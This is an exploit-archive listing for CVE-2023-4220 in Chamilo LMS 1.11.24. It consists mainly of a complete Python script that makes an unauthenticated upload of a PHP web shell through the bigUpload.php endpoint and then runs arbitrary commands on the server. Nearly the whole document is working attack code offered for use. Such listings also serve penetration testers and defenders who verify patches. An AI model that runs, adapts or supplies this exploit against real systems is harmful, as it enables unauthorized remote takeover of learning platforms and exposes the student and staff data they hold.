Exploit for Chamilo LMS 1.11.24 Shell Upload CVE-2023-4220

Name: Exploit for Chamilo LMS 1.11.24 Shell Upload CVE-2023-4220
Rating: 5 (27 reviews)
2025-03-24 | CVSS 8.1
## https://sploitus.com/exploit?id=PACKETSTORM:189976
# Exploit Title: Chamilo LMS 1.11.24 - Remote Code Execution (RCE)
    # Exploit Author: 0x00-null - Mohamed Kamel BOUZEKRIA
    # Exploit Date: September 3, 2024
    # Vendor Homepage: https://chamilo.org/
    # Software Link: https://chamilo.org/
    # Version: 1.11.24 (Beersel)
    # Tested Versions: 1.11.24 (Beersel) - August 31, 2023
    # CVE ID: CVE-2023-4220
    # Vulnerability Type: Remote Code Execution
    # Description: Unauthenticated remote code execution in Chamilo LMS <= 1.11.24 due to an unrestricted file upload vulnerability.
    # Proof of Concept: Yes
    # Categories: Web Application, Remote Code Execution, File Upload
    # CVSS Score: 8.1 (High)
    # CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    # Notes: Ensure that the /main/inc/lib/javascript/bigupload/files/ directory exists and is writable.
    # License: MIT License
    # References:
    # - CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4220
    # - Exploit Documentation: https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit
    # - Vendor Advisory: https://chamilo.org/
    
    import requests
    import argparse
    from urllib.parse import urljoin
    
    def upload_shell(target_url, payload_name):
        upload_url = urljoin(target_url, "main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported")
        shell_path = f"/main/inc/lib/javascript/bigupload/files/{payload_name}"
        shell_url = urljoin(target_url, shell_path)
        
        # Payload containing the PHP web shell
        files = {'bigUploadFile': (payload_name, '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
        
        # Upload the payload
        response = requests.post(upload_url, files=files)
        
        if response.status_code == 200:
            print("[+] File uploaded successfully!")
            print(f"[+] Access the shell at: {shell_url}?cmd=")
        else:
            print("[-] File upload failed.")
    
    def execute_command(shell_url, cmd):
        # Execute the command
        response = requests.get(f"{shell_url}?cmd={cmd}")
        if response.status_code == 200:
            print(f"[+] Command Output:\n{response.text}")
        else:
            print(f"[-] Failed to execute command at {shell_url}")
    
    if __name__ == "__main__":
        # Parse command-line arguments
        parser = argparse.ArgumentParser(description="CVE-2023-4220 Chamilo LMS Unauthenticated File Upload RCE Exploit")
        parser.add_argument('target_url', help="The target base URL of the Chamilo LMS instance (e.g., http://example.com/)")
        parser.add_argument('cmd', help="The command to execute on the remote server")
        parser.add_argument('--shell', default='rce.php', help="The name of the shell file to be uploaded (default: rce.php)")
        
        args = parser.parse_args()
    
        # Run the exploit with the provided arguments
        upload_shell(args.target_url, args.shell)
        
        # Form the shell URL to execute commands
        shell_url = urljoin(args.target_url, f"main/inc/lib/javascript/bigupload/files/{args.shell}")
        execute_command(shell_url, args.cmd)